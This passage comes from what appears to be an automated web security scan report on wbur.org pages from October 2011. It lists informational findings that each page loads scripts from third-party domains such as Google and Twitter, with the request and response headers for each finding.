<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.29. http://www.wbur.org/content/news/nation  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/nation

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/nation HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:43 GMT
Connection: close
Content-Length: 76088

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.30. http://www.wbur.org/content/news/politics  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/politics

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/politics HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:46 GMT
Connection: close
Content-Length: 80101

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.31. http://www.wbur.org/content/news/science-technology  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/science-technology

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/science-technology HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:54 GMT
Connection: close
Content-Length: 81399

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.32. http://www.wbur.org/content/news/sports  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/sports

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/sports HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:55 GMT
Connection: close
Content-Length: 85608

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.33. http://www.wbur.org/content/news/world  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /content/news/world

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /content/news/world HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:45 GMT
Connection: close
Content-Length: 75547

   
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.c
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.34. http://www.wbur.org/email-this  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /email-this

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /email-this HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:45 GMT
Connection: close
Content-Length: 7762

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<div><script type="text/javascript" src="http://www.google.com/recaptcha/api/challenge?k=6LdKKMISAAAAAPBfpsoUgxsoleTYi2VRHY4m5exT"></script>
...[SNIP]...

8.35. http://www.wbur.org/embed.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /embed.js

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /embed.js HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Last-Modified: Wed, 05 Oct 2011 18:35:48 GMT
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:47 GMT
Connection: close
Content-Length: 35362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.36. http://www.wbur.org/listen  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /listen

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /listen HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:29 GMT
Connection: close
Content-Length: 36031


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.37. http://www.wbur.org/listen/podcasts  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /listen/podcasts

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /listen/podcasts HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:29 GMT
Connection: close
Content-Length: 39976


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.38. http://www.wbur.org/media-player  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /media-player

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /media-player HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:34:26 GMT
Connection: close
Content-Length: 12908


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head
...[SNIP]...
</script>

   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...

8.39. http://www.wbur.org/npr/140401106/the-thinnest-state-loosens-its-belt  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/140401106/the-thinnest-state-loosens-its-belt

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/140401106/the-thinnest-state-loosens-its-belt HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:07 GMT
Connection: close
Content-Length: 51974


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.40. http://www.wbur.org/npr/140947193/terrorists-in-love-the-psychology-of-extremism  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/140947193/terrorists-in-love-the-psychology-of-extremism

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/140947193/terrorists-in-love-the-psychology-of-extremism HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:00 GMT
Connection: close
Content-Length: 53711


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.41. http://www.wbur.org/npr/140947830/in-homeland-its-hard-to-know-whom-to-trust  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/140947830/in-homeland-its-hard-to-know-whom-to-trust

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/140947830/in-homeland-its-hard-to-know-whom-to-trust HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:16 GMT
Connection: close
Content-Length: 48350


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.42. http://www.wbur.org/npr/140961754/eating-meals-with-men-may-mean-eating-less  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/140961754/eating-meals-with-men-may-mean-eating-less

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/140961754/eating-meals-with-men-may-mean-eating-less HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:13 GMT
Connection: close
Content-Length: 55601


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.43. http://www.wbur.org/npr/141011341/wh  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141011341/wh

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141011341/wh HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:11 GMT
Connection: close
Content-Length: 51425


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.44. http://www.wbur.org/npr/141013682/wnba-has-higher-tv-ratings-but-uncertain-future  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141013682/wnba-has-higher-tv-ratings-but-uncertain-future

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141013682/wnba-has-higher-tv-ratings-but-uncertain-future HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:01 GMT
Connection: close
Content-Length: 50382


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.45. http://www.wbur.org/npr/141045337/will-christie-be-shermanesque  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141045337/will-christie-be-shermanesque

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141045337/will-christie-be-shermanesque HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:13 GMT
Connection: close
Content-Length: 50030


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.46. http://www.wbur.org/npr/141046490/mississippis-jobs-program-a-new-national-model  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141046490/mississippis-jobs-program-a-new-national-model

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141046490/mississippis-jobs-program-a-new-national-model HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:20 GMT
Connection: close
Content-Length: 61797


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.47. http://www.wbur.org/npr/141047227/the-luxurious-revenue-college-sports-model  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141047227/the-luxurious-revenue-college-sports-model

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141047227/the-luxurious-revenue-college-sports-model HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:02 GMT
Connection: close
Content-Length: 49031


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.48. http://www.wbur.org/npr/141048472/whats-its-like-to-live-on-the-lam  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141048472/whats-its-like-to-live-on-the-lam

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141048472/whats-its-like-to-live-on-the-lam HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:18 GMT
Connection: close
Content-Length: 75253


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.49. http://www.wbur.org/npr/141048505/jacques-pepin-selects-his-essential-favorites  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.wbur.org
Path:   /npr/141048505/jacques-pepin-selects-his-essential-favorites

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /npr/141048505/jacques-pepin-selects-his-essential-favorites HTTP/1.1
Host: www.wbur.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
ETag: ""
Server: Microsoft-IIS/7.0
X-Powered-By: PHP/5.3.6
X-Pingback: http://www.wbur.org/xmlrpc.php
Date: Wed, 05 Oct 2011 18:35:18 GMT
Connection: close
Content-Length: 74768


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
</script>
   <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js"></script>
...[SNIP]...
</ul><script src="http://platform.twitter.com/widgets.js" type="text/javascript"> </script>
...[SNIP]...
<div class="tsearch">

<script src="//www.google.com/jsapi?key=ABQIAAAAy4xSq6d9KXcFtdT__te8EBR7Y5AJmhrkRzC_4iUlm7WgLTBphRTkClQNyhBo4TkGPAOKdaOMD6E2Zg" type="text/javascript"></script>
...[SNIP]...

8.50. http://www.wbur.org/npr/141052309/authentic-egyptian-music-is-from-the-streets  previous  next

Summary

Severity:   Information
Confidence:   Certain
